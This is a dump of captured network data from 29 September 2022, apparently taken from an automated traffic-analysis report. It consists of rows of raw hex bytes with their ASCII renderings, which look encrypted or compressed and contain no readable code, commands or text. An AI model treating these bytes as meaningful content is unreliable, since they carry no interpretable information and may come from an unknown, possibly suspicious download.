                                                                                                                                                2022-09-29 12:51:37 UTC13628INData Raw: 45 01 58 c7 82 91 00 a8 f0 e5 c7 66 cf cd 0b 69 15 cb 59 b2 d5 f3 0a 91 46 37 33 d1 30 39 a0 eb b3 e1 e0 db 2e 3f cc 55 53 b3 bf b4 db 22 34 73 5c 33 11 9b 1b f2 f1 9b e0 c6 e0 a8 1d 4e 12 f2 f9 b5 a6 89 ea 36 8d 1c ad b6 11 92 2d ca af 07 4d 20 84 dd 03 24 6d 82 c9 bb 52 be 5a 20 75 2f 47 6d f8 52 87 29 31 60 11 28 b5 ad ef 5b a2 1f 81 80 23 b7 4e de fe 9b 50 6a a7 e7 a7 36 82 d7 0f 08 ef ae ad 7e cd 7d 19 8d f9 df 97 ee ba a2 a2 7b 87 cd 3d 0c e4 52 9f f2 35 4f b9 7e b4 31 e6 83 94 d1 bf 76 50 97 cc 94 5a 0c d1 4c 6c f9 03 18 4a 41 63 18 62 d5 92 47 e1 34 ad d0 0b cd 40 40 b5 fb 21 9c c0 92 a4 1e d6 63 b9 a2 22 12 ba cd 61 0d c2 c3 be 33 e5 46 bd 6a e5 bd b5 1c 94 1d ea b8 40 94 be 78 79 2f 21 64 37 dd 5c f7 b9 53 91 6e 2f 47 c9 50 2d fe 3b cf cf 63 6f
                                                                                                                                                Data Ascii: EXfiYF7309.?US"4s\3N6-M $mRZ u/GmR)1`([#NPj6~}{=R5O~1vPZLlJAcbG4@@!c"a3Fj@xy/!d7\Sn/GP-;co
                                                                                                                                                2022-09-29 12:51:37 UTC13644INData Raw: 1a d8 6d 88 55 53 3f f1 67 44 25 db 3a 8b 12 3a 19 2a 8d a3 ae 0c 98 d7 27 8f e0 df 5f 62 05 97 db 81 8b 69 3e 74 54 5d b9 c9 22 42 7e 48 f6 c7 77 d1 d3 18 3e a4 cd bc 02 39 1d d7 a0 0b 19 78 96 ab 69 f9 0a 40 20 75 5c 95 2f bb c1 0e 39 92 db 03 38 67 17 ef d7 f1 ad 94 97 0b 17 76 ef ee b6 c8 26 c1 d2 87 89 34 ef cf e7 31 e0 c3 9d 9e 31 f1 87 b4 ae 75 7f 38 7c 40 89 fd cc dc a7 d6 e3 11 89 6b 61 c1 79 ec fb e2 4c ae 91 1a 28 78 75 ec 68 5e b2 4b 0e 9d 26 4c da 79 f7 07 d6 72 9b 87 22 bd b4 59 56 ef 63 75 10 86 31 9e 19 cd 5f 91 fe 66 24 d1 9d 5c dc 0f 4b 0d ab 50 c5 75 78 c8 92 fd a0 7e a0 c8 a3 a5 14 8e 58 6b f9 da 81 bb 33 ad 5b 05 69 e0 9d 34 9d 78 b0 00 ef 32 aa 29 34 b5 f9 3a af ee e6 14 60 4c 1c a6 f5 a8 49 08 ef c6 46 e0 62 1a a1 49 8e 54 a1 c3 44
                                                                                                                                                Data Ascii: mUS?gD%::*'_bi>tT]"B~Hw>9xi@ u\/98gv&411u8|@kayL(xuh^K&Lyr"YVcu1_f$\KPux~Xk3[i4x2)4:`LIFbITD
                                                                                                                                                2022-09-29 12:51:37 UTC13660INData Raw: 28 69 08 6f 7d 52 f8 d7 f5 67 63 f9 b6 36 9e 4b 8f 28 bb 91 85 01 da 3c f6 f5 65 0a eb cc 17 ed f7 f7 b1 4e 4d 18 1d 58 58 1c b9 a3 92 3a 6f 46 25 03 7f f8 83 6f f6 9d 6f 6e ee cf 2b be cd 15 1e 25 63 b1 ee 7e 36 77 2e 4c e4 a9 b0 e5 65 6c e9 a5 90 4c ce 3d ce 6b 3d 59 26 cf 43 10 63 c1 47 f3 5c 9d f1 e2 86 7d ff dd 90 96 c7 34 ba f9 a9 5b 7c d9 ac fa 1f 62 fc 49 07 68 5d d7 53 e2 57 82 bd c6 ea 4d 3c 70 b1 d3 38 88 fd d2 ea 93 92 0b 74 bd e5 64 85 1b 80 5d 0a 58 8c b5 db 22 40 7d d6 45 9e c1 ed e6 8b 86 a9 d2 c8 3e ef be 07 6e f0 22 49 09 b7 73 61 67 5c 43 c9 ec 96 03 66 bf 32 62 2b 1f 6c 77 d0 15 80 a3 e4 3e 0d 60 ad fd 01 4a da 34 4c 64 02 62 b8 a2 03 e8 77 cb d9 1f f5 60 94 82 15 6a be 5f 09 90 e8 f0 c7 86 e5 1d d9 b7 d0 dc 0f c9 36 ab ca 1e d9 03 33
                                                                                                                                                Data Ascii: (io}Rgc6K(<eNMXX:oF%oon+%c~6w.LelL=k=Y&CcG\}4[|bIh]SWM<p8td]X"@}E>n"Isag\Cf2b+lw>`J4Ldbw`j_63
                                                                                                                                                2022-09-29 12:51:37 UTC13676INData Raw: ed 18 1b ee db b1 da c1 51 d0 a8 8a c3 a5 ab 5c 64 ba 78 37 a9 c6 8b 62 e8 85 70 9f f9 ae 8c d2 86 a9 55 ea d1 d0 5b 84 5e bc bc 07 02 92 a2 5b f1 59 64 5e 8c 05 6a 0c 31 c9 9a be ea 78 28 b8 92 b9 2a af c1 ac 06 3e eb b6 b1 fd 15 0b a5 f5 47 cf a8 60 86 42 c3 b6 3a 92 21 5b 7e 98 de f6 c6 14 10 69 97 ab 00 f5 9d b1 48 b7 7f f1 a3 54 03 1d a0 08 b9 b6 46 f3 e4 e5 48 40 c3 a3 28 81 cf 3f 2e a6 1e b1 46 19 9a d6 62 77 0a 01 b4 c4 9f 70 28 c1 e6 43 52 f3 c4 b8 db 25 c4 0b 9f 6e 47 10 38 25 8d 24 4c 6c 93 63 7c 49 0f 71 76 8b 15 1f 9a 70 40 9e 2d 43 2d 77 fe 61 69 df a4 a2 03 ca 67 0a a1 43 e7 84 68 ec 3b b3 83 f2 7f 99 04 27 22 ef 1b de a5 7e f9 8e 0f cb 6b 89 47 3f 0d 4c 24 dc d4 e6 09 0f 87 86 44 5a 44 c4 7c 03 f7 80 f8 fc 39 73 07 1c 54 eb ce d6 cc c6 aa
                                                                                                                                                Data Ascii: Q\dx7bpU[^[Yd^j1x(*>G`B:![~iHTFH@(?.Fbwp(CR%nG8%$Llc|Iqvp@-C-waigCh;'"~kG?L$DZD|9sT
                                                                                                                                                2022-09-29 12:51:37 UTC13692INData Raw: 2e 59 f3 e2 55 c9 4f 68 b4 c4 f7 da 86 da 50 f3 be 74 69 ab 52 07 da ae 94 d1 c1 07 e1 c8 71 ce 62 6a 2f 17 2a d2 ac 4e 9a d0 55 85 2b 22 b4 d8 e7 d1 a4 69 da 9a 58 fd 1e e5 df 8f 7b 17 8d b7 05 c1 7c e1 90 74 d2 8b 39 98 90 68 94 8b 40 fe fd 78 fe 90 bc 57 55 eb 7f c7 7d f0 7e b4 d6 7c 8d a3 a3 da 2c 4d 81 d4 6d 3f 8b 49 85 e9 99 2f ce 6d f5 ae 4b 3f c2 72 e4 6d 08 84 6d 0b d3 9d f7 48 93 ee 4e 41 9b 42 d1 dd c3 d0 57 fd bb 42 d3 65 f3 94 f4 32 94 b0 53 c5 35 d3 ad 09 4a 2d 61 44 8a 9a 43 d6 0c e0 e3 26 6b 8a 8a d4 90 19 e4 5e 53 db e7 48 2a dc f6 50 f3 89 9d b1 99 23 a6 9b 32 a3 6a 1f a4 c6 b3 03 eb 06 16 c8 7c 6d d3 be 4f 17 ac 03 ad bf 1f 8a 47 26 88 e5 d4 9d 3a 06 68 8b 65 2c 35 0d aa 89 10 72 0c f3 60 8c f1 e7 9b 5e fc b0 27 fc b4 58 dd 0c c9 80 d2
                                                                                                                                                Data Ascii: .YUOhPtiRqbj/*NU+"iX{|t9h@xWU}~|,Mm?I/mK?rmmHNABWBe2S5J-aDC&k^SH*P#2j|mOG&:he,5r`^'X
                                                                                                                                                2022-09-29 12:51:37 UTC13708INData Raw: b2 05 fa 7b 58 3c 3d 65 26 e3 17 92 dd 8c 6d 41 cf 72 02 39 bc ba c4 27 05 9d dd 1e cf b6 8d 68 ec 0c cf cd 23 00 dd d9 a9 11 fe 3a 34 e4 d0 af b4 35 c3 b0 3c 54 13 8b 71 13 08 af 1e 4e 0e b4 63 c9 84 83 0e 42 6b 23 c5 70 2a b6 5a 8a 80 d9 be fb 1b 89 6c e2 24 e5 95 1e 6f ad 3d a8 ca e0 df 95 47 a5 89 a7 14 b3 1f 4c 35 19 de 48 c2 30 84 6d 94 6b e5 af 69 df 7d 4d 3c 8f 7c b3 31 1f fa be 66 1a a7 ba 4c 93 7e 34 27 f6 7a aa f5 31 df 83 57 51 0b c8 0a f2 08 95 50 15 5d 9d 4b 05 7a d1 f0 2d 3d f2 a6 e7 4c dc 28 c9 90 24 58 dd 7d a8 aa 42 b8 cc 0b 06 66 c4 66 4e 9c 07 ff 9f 0c d1 f2 83 f7 f7 b0 81 dc a3 e7 f7 5d 5a 8e 10 89 9e 74 97 c3 71 f8 11 d1 ba 1a 04 cc 39 57 13 83 4c 9f fc 33 33 35 8a 4c 1c 9e 10 57 7e 35 0a 50 e5 eb ed a9 dd 6e a4 8a 60 30 da 64 6a 32
                                                                                                                                                Data Ascii: {X<=e&mAr9'h#:45<TqNcBk#p*Zl$o=GL5H0mki}M<|1fL~4'z1WQP]Kz-=L($X}BffN]Ztq9WL335LW~5Pn`0dj2
                                                                                                                                                2022-09-29 12:51:37 UTC13724INData Raw: 51 11 ff 41 9a cb e8 6c 48 f1 30 b5 b3 10 9e 26 22 bb 26 8c 9c 3a 89 90 a1 66 90 c1 be c8 89 d7 95 9a 19 44 a2 e0 43 44 fb 12 88 f7 fa d4 2c c6 8f c3 c4 05 25 44 7a a2 47 63 58 7c 32 24 c7 70 60 bb 3c 5a cb 4e ae 7b 5a 32 e1 88 1e 1c f4 5a b0 88 85 8a 29 af 14 e4 ca 4a a7 1a cd 90 96 29 f5 8c 9c df 1a e6 41 48 1f a9 a7 db 00 dc 79 1b 62 a7 aa 45 f3 4a 97 f6 20 ea 2c 35 1f 7b ec cc da 6e 9f fd e3 48 37 be 7a 4a 63 88 66 f2 41 d3 13 47 bb 33 50 83 a6 f6 e4 79 53 41 b6 e2 18 29 dc 62 b2 49 2e eb 1f 86 1f ff 70 d9 9e cc 67 3c 4a 4b 01 18 7b 6b 1f 1a e9 ea 99 c3 57 d5 a4 44 f9 7b bf 33 86 bf e6 72 7e 89 0e a8 b2 04 c5 ad f7 77 f4 5e 52 46 80 50 e1 3c c6 9e cf 3f 59 fb 87 9a 45 83 41 1a 81 ce 65 a2 91 d0 ed ae 9c 5d 9a 70 12 f6 dc 5a 70 32 0f 9f 28 e2 22 bd dc
                                                                                                                                                Data Ascii: QAlH0&"&:fDCD,%DzGcX|2$p`<ZN{Z2Z)J)AHybEJ ,5{nH7zJcfAG3PySA)bI.pg<JK{kWD{3r~w^RFP<?YEAe]pZp2("
                                                                                                                                                2022-09-29 12:51:37 UTC13740INData Raw: 24 9a 68 6c 47 fe 9c 66 ed 08 93 b1 ee 25 13 c5 68 bb 7b 97 45 cf 9e 9b 71 ca 71 0c 77 5d 25 28 5f ac f9 44 db b2 37 a4 77 52 65 92 cc 0e 24 7f 29 29 2c 10 44 90 80 75 77 de ca 63 72 ae 51 ff 83 3f 2d 81 e5 14 59 16 f1 c7 b1 c5 d2 74 ae 6a 1c 3e 99 39 94 c8 c4 c7 e7 bd ca 12 84 bd b2 f2 06 28 0f e3 9e c9 5a de 01 58 24 54 23 38 8d 7e 86 71 98 e4 a4 f7 47 35 6c 93 d2 a8 e0 70 db 97 f2 30 77 fd 27 b3 f3 8f 52 2e 4f bd 1f 0b fa a2 ba 53 1c 16 5c 19 88 c2 63 c0 2d b3 94 42 98 a4 c7 13 87 55 0a 9f 88 a2 7f ac 1b 0a 10 d4 ff b0 3a 2a f0 63 34 b9 92 8a 21 8c 4c ad e2 d7 52 be d2 2f 64 99 10 0f 86 ad 2b b0 3e df ba 46 50 66 4b 82 a2 5c 9d 49 47 17 bf b1 a2 76 dc c4 bd 0e 86 bf b8 5f eb 89 cb 67 77 a0 d6 e8 0e 7f 5a 32 7f 2a 69 4b 1d e6 c9 3a d2 39 54 bf f2 3c 44
                                                                                                                                                Data Ascii: $hlGf%h{Eqqw]%(_D7wRe$)),DuwcrQ?-Ytj>9(ZX$T#8~qG5lp0w'R.OS\c-BU:*c4!LR/d+>FPfK\IGv_gwZ2*iK:9T<D
                                                                                                                                                2022-09-29 12:51:37 UTC13756INData Raw: 89 9b 1e bd 40 51 92 d4 ac 05 da 83 dc 6a f6 8c 95 fc 31 43 4f 76 c9 82 a7 51 5a 8e 04 44 a8 96 00 9b db b3 b9 51 c1 c0 94 b4 c8 64 94 88 4e d0 c6 fe 61 17 52 95 38 5b b3 5b 85 0e fa 50 bb 0f 7c 07 e0 e5 65 3f 18 51 0e e5 74 28 a8 54 d2 4d 1c f5 91 ca 47 b1 30 ff 85 18 14 5c 37 1e 50 ca 53 e9 64 21 eb 79 c8 17 03 0e 84 f9 15 7a 48 43 fa 58 e7 57 f6 ab a0 94 76 f1 f5 5c c3 b5 d1 24 0a f4 a8 94 a4 8d b5 09 e2 e6 c6 ea b0 fb ce e6 86 05 57 df db 6b 1b dd c3 58 f6 94 c1 09 4a fe 3c 2c ba a5 2f 2e 24 1c 1c 92 bf 88 c9 dd 2b 57 08 23 ac 39 7d 96 48 dd 92 ba 21 8d 0e a0 d0 f0 b1 6b af 88 b1 f5 5f fc 63 d6 73 23 ae 91 61 d9 82 61 69 b5 b2 61 79 bc 1a 0d f6 98 87 98 f9 cc be ad 20 d1 e5 45 d5 ec 4c bf 3f ee 3d 76 a5 43 a6 ec 2b 75 f9 50 b1 d4 97 fd 6a f7 02 f9 b2
                                                                                                                                                Data Ascii: @Qj1COvQZDQdNaR8[[P|e?Qt(TMG0\7PSd!yzHCXWv\$WkXJ<,/.$+W#9}H!k_cs#aaiay EL?=vC+uPj
                                                                                                                                                2022-09-29 12:51:37 UTC13772INData Raw: 51 8b 96 8f e9 c8 40 86 30 43 9b 17 79 b6 21 ad ec cf 7b f7 12 74 b9 3f 7c 97 7d 3d b2 15 b7 f3 cb 9b 4a 63 a5 b8 f1 a3 4f 1c 48 78 2e 10 ae 77 77 4e 31 09 7f 4e d3 3a d9 1a fe 3e c1 ac 92 ed 73 ed a1 00 cd 56 9f 15 1c 4b 6b b9 5c bf 98 29 0a ee f3 33 85 2b 02 2e 8b 7f b2 c8 4c b0 26 6e cc e9 7f 8f 7d 8b 31 6c 07 dd 27 f3 21 1c 69 28 77 3b 5f 31 d2 c0 5e 98 39 9d 79 9d 2c 24 fe ef e5 09 e7 21 ab 55 b0 db 43 2c 2d a1 db 46 a2 1e ad a9 ea 9a 7f d1 aa e7 17 15 43 da f7 15 fd 2d c7 c7 6d 9d c0 ce 4e 7e a8 cd c8 0e cf e5 91 ad bd 5b 52 fc 1a b3 01 aa 29 61 aa 45 2f 29 a3 37 03 79 af 42 90 1a bc d5 d4 5d 3f 9f 60 07 8c c0 e6 50 69 48 5e 9f c4 cb f4 f1 f6 a7 26 f0 b1 e7 62 c8 ea 15 7f d1 45 da 2a c9 f6 03 ec 8e 49 22 31 cc d2 60 87 4c 78 74 93 27 48 1f 3b c9 66
                                                                                                                                                Data Ascii: Q@0Cy!{t?|}=JcOHx.wwN1N:>sVKk\)3+.L&n}1l'!i(w;_1^9y,$!UC,-FC-mN~[R)aE/)7yB]?`PiH^&bE*I"1`Lxt'H;f
                                                                                                                                                2022-09-29 12:51:37 UTC13788INData Raw: 18 98 2a 42 b7 5f 9d 31 0f dd 34 a3 32 4f ba 17 9b ab a2 32 37 14 89 3a 1e 6b 17 a2 e6 67 80 62 a2 b9 40 a3 3c 96 b5 dc f1 ae 97 b7 c3 6d 51 e5 37 8a 56 ab 6a be ba c6 ef 40 5b 44 de 72 7c ad 00 9a bf 8b 85 6f 75 91 29 65 a9 f4 12 28 bb 43 a9 bf d4 95 8f b3 e5 76 6c ed 58 c7 9c 4c cc b7 ee 24 43 d8 4e 10 d4 a8 e1 ba 20 17 36 1f ea 61 11 49 fc 6c 1c 74 7d cf f5 79 f2 bd 32 49 85 9d af 5e d2 2b 9e b6 ed ce bc 06 b7 36 70 6a 5e 41 b4 29 40 6f 72 ec ba 40 62 15 76 c7 ab 76 16 2d d4 b8 3e d5 75 e3 63 41 58 49 e1 73 ed 61 34 d0 94 60 fe 8d bf ae 4b 56 c9 6f b8 32 1b e2 01 8b ee 0b f4 a7 8c ca 84 51 07 2f b3 f3 2c be cd 28 74 91 ce e1 4f fc 40 a3 d6 cb 3e 2c 47 4f ae 08 23 2f 6c d0 38 5d 67 c4 c7 89 4a 55 07 22 8a 29 c2 3c 34 d6 da bb 34 b8 a1 eb fb 3d d6 45 bf
                                                                                                                                                Data Ascii: *B_142O27:kgb@<mQ7Vj@[Dr|ou)e(CvlXL$CN 6aIlt}y2I^+6pj^A)@or@bvv->ucAXIsa4`KVo2Q/,(tO@>,GO#/l8]gJU")<44=E
                                                                                                                                                2022-09-29 12:51:37 UTC13804INData Raw: 69 0d 9c 2c 6f 90 0c 78 58 fc ae 44 40 5a dc f1 c4 46 19 3e 90 ab 29 c4 c6 bf 62 0f 8d d7 19 1b 91 33 d1 a1 4b 44 df 7b 46 c2 50 10 d3 b7 c8 7b a1 cf a7 f5 2d d4 51 38 f9 7f e6 d7 36 d3 98 7f ba 87 c6 5b 34 35 65 d2 36 bc f8 dc 7f 79 b1 c8 cc a0 0d 0c 80 fd 67 03 84 60 14 59 6b 44 db 59 17 f4 9b 7d 28 bf 82 29 e7 59 49 11 90 16 1e 14 93 4b 82 13 e6 ca 98 f6 70 bf 59 c9 2d b8 c1 74 24 d2 df 6a 67 9e 58 86 14 90 28 59 c1 2e b8 8f c4 d4 04 5c fc 5a 82 81 7c f9 40 31 52 50 cf e4 0e 71 b1 95 7b f8 ac 76 b5 ee e5 c8 96 a1 75 2e 60 6b 9f 0e 1f 20 78 f6 0c 2c 6c e4 9e 8d 03 6c 40 80 c6 c6 a8 14 79 9e 5c 01 6b 0f ed c8 c1 ca 6b 4a bc 04 61 87 f2 96 58 de 41 48 c2 1e 9d e9 d8 97 a8 27 f9 c7 0c 44 06 f3 98 50 b7 4d 82 2b ce ed e4 83 04 7d 10 f3 b7 82 12 59 30 b1 29
                                                                                                                                                Data Ascii: i,oxXD@ZF>)b3KD{FP{-Q86[45e6yg`YkDY}()YIKpY-t$jgX(Y.\Z|@1RPq{vu.`k x,ll@y\kkJaXAH'DPM+}Y0)
                                                                                                                                                2022-09-29 12:51:37 UTC13820INData Raw: 33 0d 55 85 d8 71 de 16 4f 8f 63 94 38 8b 4a 5b 5f 66 2a b4 36 d1 53 e5 9d 66 db c5 45 15 d1 0f 00 ab 3c 9d 9f d9 1e 2c 08 65 2b 07 74 c2 2e 93 59 28 2b ef 61 e0 d5 03 66 50 5d 5b 27 41 35 f1 2c 3e 77 69 7e c4 75 ce e7 e0 81 2d ad 0f 58 75 64 f4 fb 9c ef 91 47 fd 5a e7 82 85 b7 f4 e9 28 fd ff 61 95 8b 7b b7 42 51 13 d5 4a 02 47 39 6e 57 bd b8 31 d4 39 dd b8 da d2 32 ae 1d b8 26 44 0a e7 f6 e5 5e 9c db f5 bc 4f 8b fb c6 e5 c8 f9 e3 fc d0 10 88 50 47 b1 48 7c be e6 85 92 04 b7 3b f9 1f d4 de 35 50 d2 01 6f c9 9f f9 40 ce be 9f d1 44 79 0a 07 ef fc e5 90 72 6e cb 9d ee 2b 3f 48 32 07 f7 ef 99 6b 9d 6e af a4 bf 20 09 29 6b 0d 37 7d 31 39 63 38 d0 d5 88 d0 37 c4 27 36 50 60 be a2 22 62 d5 14 b6 79 c1 21 d2 ad 0d 8c ec fe a5 48 7f fd 73 ea 75 26 6b d9 16 7f ad
                                                                                                                                                Data Ascii: 3UqOc8J[_f*6SfE<,e+t.Y(+afP]['A5,>wi~u-XudGZ(a{BQJG9nW192&D^OPGH|;5Po@Dyrn+?H2kn )k7}19c87'6P`"by!Hsu&k
                                                                                                                                                2022-09-29 12:51:37 UTC13836INData Raw: f3 14 86 26 c6 91 e7 09 ba 0e e7 54 da f0 24 de 45 ac 6d 83 7f bb ed 8a e0 d8 a7 71 81 33 5a f6 05 e2 5a 44 54 c9 8a a0 3d 6f 8c 96 8b b3 3b f6 13 72 40 15 44 c7 f9 f2 76 c6 77 d9 88 cc fc a4 6b 6b 0e 06 0b 35 51 51 ee 8f a6 2f b4 55 25 65 2b d7 8c 6c 32 4d e8 b5 64 50 c8 f2 19 3e 75 74 f8 80 4d e5 16 aa 12 41 af 80 0d 74 59 cf 83 ba de 1b 7a 69 7e 59 a1 08 2f 05 e9 68 02 c2 b1 fd ba bc 8b c1 fa fa 97 cc 23 c7 dc cd f5 f4 b3 39 ae a0 af 6a 32 fd 8c 21 15 68 5a f7 5f 75 15 5b 5d c4 53 45 55 e9 ff 86 75 1a 4e 9f 34 66 1b 9b 1c aa 5f 44 dc 41 de 8d 87 e3 33 81 40 83 f1 15 bc 35 94 27 d4 e0 40 06 06 5b c4 f2 58 c1 b2 3b d5 b7 70 7f b0 f0 ec 99 a5 b5 66 a3 be 88 e0 79 62 51 69 37 ef 35 e3 eb 43 f9 d8 f7 b0 a1 ab 2a ff 04 da 66 b7 84 1c bc 92 b9 d0 8b a0 19 ca
                                                                                                                                                Data Ascii: &T$Emq3ZZDT=o;r@Dvwkk5QQ/U%e+l2MdP>utMAtYzi~Y/h#9j2!hZ_u[]SEUuN4f_DA3@5'@[X;pfybQi75C*f
                                                                                                                                                2022-09-29 12:51:37 UTC13852INData Raw: aa ff 46 34 51 94 90 f5 32 c1 20 fb 47 d4 18 3b 24 c7 84 42 c1 10 fd b0 77 3b 5b 77 76 98 f2 d2 b4 2a d2 ad 61 3a b6 8e 42 e6 3c 4d 70 e1 e9 2c 2e 7a 88 93 ef 0e 46 3a a2 c3 67 3c f4 8c 22 a7 5e a1 cd f7 f7 2e 86 24 6a 57 9c 37 e6 c5 ee fd 33 fe 80 f4 28 91 5d 6b 73 3f 65 ab 6c 5d db 34 f0 2f 9e a2 ba 40 b7 57 58 a5 36 eb a6 08 fa aa a6 e2 71 33 61 8e 0e e7 3d 36 44 22 5d 49 02 22 da d4 c4 5c 21 25 a9 0b 0b ca 8f cf f8 40 ff 93 c8 f3 32 40 01 63 ad 65 6d 12 24 e2 38 29 62 5f 80 b7 7f 2a 20 0d c9 a8 4e c3 8c a0 ab a9 f8 7b d5 64 46 7b ba c6 da af 32 2d 22 13 40 92 5a 6c fb 72 d0 80 fc 38 8a 49 b8 55 2c 75 17 d0 9c b6 30 d5 55 91 5c 0a e7 41 c5 0b 6f d5 2b eb a8 c8 39 6b 27 86 9d 4c c2 3e 6d 56 af 64 bb 3e 15 82 68 94 9a f5 9a 89 ac 2f ca 66 fd 6e 92 8b 5b
                                                                                                                                                Data Ascii: F4Q2 G;$Bw;[wv*a:B<Mp,.zF:g<"^.$jW73(]ks?el]4/@WX6q3a=6D"]I"\!%@2@cem$8)b_* N{dF{2-"@Zlr8IU,u0U\Ao+9k'L>mVd>h/fn[
                                                                                                                                                2022-09-29 12:51:37 UTC13868INData Raw: 49 ff db ef 9d a9 4a 1d 11 71 bc bd fc bf d0 4b fd e4 34 aa 07 45 cd ee 33 75 80 a8 41 6b 13 dc 94 d0 e3 f9 9d 3a 25 b9 aa 39 cb 47 40 8f 9e 98 44 42 43 b8 79 a9 d7 b5 6e ba 77 8f 36 05 d3 ea b1 ab fb eb 1d 6a 98 dc 4d 1b 36 f9 a6 d5 f2 e5 00 7c 46 aa ad 04 14 26 b5 e9 11 34 25 a2 3f 2a 3d 20 28 a7 bd 65 79 1f 62 88 eb ab 62 11 d3 31 9c 7a 43 f7 19 61 df 80 05 4f 87 c7 37 e0 41 01 48 d8 d3 31 d9 3b 50 5e 00 4c 3c ba a6 6a 50 5c 83 1e 5f 48 3f 9c 9a 7e 2d 33 dc d9 69 1b b7 8c 90 18 32 d1 e0 28 94 15 9f 41 7b 38 54 53 d3 3a d3 c7 06 fa cb f0 e5 aa da 14 f4 57 48 36 2d 9a e5 63 5a 5d a0 e5 d6 b9 ef 34 66 e9 db 18 e9 d2 ec 4f 45 f2 bc 2d 58 6b dd d8 b7 76 14 c5 4f af 33 af bf 45 f5 b2 fd 3c 74 67 a1 44 ca b5 bb b8 f0 ba d7 2d 30 95 61 b6 ab bb e3 0a 9f 15 96
                                                                                                                                                Data Ascii: IJqK4E3uAk:%9G@DBCynw6jM6|F&4%?*= (eybb1zCaO7AH1;P^L<jP\_H?~-3i2(A{8TS:WH6-cZ]4fOE-XkvO3E<tgD-0a
                                                                                                                                                2022-09-29 12:51:37 UTC13884INData Raw: c9 c8 79 13 b5 57 a1 01 79 ac 9b 82 c9 d3 19 de b9 d0 5a ba c3 54 f8 81 4a 38 46 09 41 08 15 c4 eb 05 94 82 e4 47 9f 29 c5 60 d8 26 4e 3d 60 f0 dd 05 b8 bd f0 01 42 35 aa fb ce d5 8f 3a a6 45 a3 ea dc bd 1a 5b 20 e0 0c 99 0a 01 0a f9 ab d4 86 1d 7b 78 ff b5 fd 5f 9f e1 56 ee fb 98 51 a0 95 bb cd 46 13 2b d2 f4 a5 7a 7c 03 a7 fe 2b c5 b9 00 b4 d0 c7 40 69 c5 41 cc b9 48 88 0f 5b b6 03 ed ec 79 f4 fb 93 68 cc b9 8c 85 88 e4 7b 5f 00 8e 6b d0 d3 ed 5b 90 3a 6d c6 f9 0d 3a 7f 96 62 51 7b e4 12 00 9e c6 09 66 cb 4e 0c 41 30 fc 00 66 ec 9a 7b 0c 7d d4 19 c4 22 b5 e4 9d ec b1 67 08 e9 0d 5d 19 dd e4 1d 89 1f 79 3b 5c 53 48 50 85 50 06 be 77 d3 d3 fa 0b 58 14 42 26 a3 43 e3 82 cf 21 80 02 67 29 20 e4 8b da c0 5a 78 4d 91 46 36 b1 38 7b 92 e7 f7 ee e1 78 97 1e f6
                                                                                                                                                Data Ascii: yWyZTJ8FAG)`&N=`B5:E[ {x_VQF+z|+@iAH[yh{_k[:m:bQ{fNA0f{}"g]y;\SHPPwXB&C!g) ZxMF68{x
                                                                                                                                                2022-09-29 12:51:37 UTC13893INData Raw: b7 d1 70 93 ba c8 82 12 78 20 10 de e2 ff 02 86 ab 3e e3 fa 31 42 74 04 f4 80 59 ca 15 0e 88 7b 6a a5 09 75 65 75 21 96 8d 6e 90 ad 53 ca 84 4e e5 92 ca 63 bf 0c b5 d0 36 7f 02 18 86 fe 6a ee 03 22 38 07 71 c9 64 9f 33 67 cf a9 10 be 1d 3d 3a e6 59 70 63 4e 28 d9 de 4f ec 34 99 cf ab 17 1a 73 dc 59 eb ed 1a 81 55 2f 31 4c 43 f1 b4 7c 29 0b e7 93 e8 95 71 33 09 f4 b8 f8 0c 7e 13 46 b6 bb a0 6d 67 da 05 e3 49 b7 ba 1d 54 01 2b 9b 9c 94 6e 27 42 d0 e1 f4 54 a6 0d f2 e0 ac af f0 27 10 86 ef 1c cf 0b 06 4f fd de b9 bc 16 d8 c9 2a 41 12 1b 0e 4d fd 21 3b 28 63 09 f1 94 b8 a4 02 1f e3 db c9 61 ea e7 20 29 a6 48 77 ac 10 9b 86 17 a5 cb c2 b1 78 8d cf 18 22 89 a3 1c 4e ec 73 62 ed 68 d2 0b 0f 58 8f 6c 39 89 7f 2f 28 40 ba 27 0b 8b bd f6 9f 2b b6 d6 43 92 b6 f5 81
                                                                                                                                                Data Ascii: px >1BtY{jueu!nSNc6j"8qd3g=:YpcN(O4sYU/1LC|)q3~FmgIT+n'BT'O*AM!;(ca )Hwx"NsbhXl9/(@'+C
                                                                                                                                                2022-09-29 12:51:37 UTC13909INData Raw: 77 2e b7 e1 d7 16 8d 7c 22 01 c5 22 d9 b0 a5 bd 2e e0 7f d9 43 ba ff 8a e9 71 e9 dd 37 fa f4 a4 a2 3d a1 77 57 7d f1 69 d5 7a ae bf 1c 3f af c2 f5 13 63 72 70 54 63 ca 7a fa 56 e9 d0 de 2a df ed 2b a3 fd 0a 9c 2a 42 fb 2b b1 43 78 46 8f f7 50 5f 4f c9 3e eb b7 86 b4 ef 1c d8 b5 89 60 9e 72 21 f1 a2 f3 41 9f 78 9e b3 c8 12 2a 74 bb 43 79 a1 be 95 bf af 51 60 4e b0 c1 a3 5d 44 95 30 3f 25 43 40 45 a9 84 c1 18 3e d1 f8 5a e9 77 df fc d4 48 6f 82 90 c5 9a 1a 25 4f dc ed 72 0a 0c 79 a6 1f e1 aa 08 d7 b5 f9 b7 aa 9a fd c1 51 c4 8c bb 3d b4 44 85 90 88 19 66 3b eb f4 02 a3 5e f0 93 3c 9a 8c 42 5f 60 19 18 1a 9a 13 18 84 28 4a f2 85 61 a5 8f 55 bc c1 ce f4 b5 3c a5 4c e0 89 6c 86 59 b0 9a 93 94 aa af cf 86 e3 9a b8 93 2b 21 be 6d b6 16 8a b6 b3 a6 60 3b 9f cd e7
                                                                                                                                                Data Ascii: w.|"".Cq7=wW}iz?crpTczV*+*B+CxFP_O>`r!Ax*tCyQ`N]D0?%C@E>ZwHo%OryQ=Df;^<B_`(JaU<LlY+!m`;
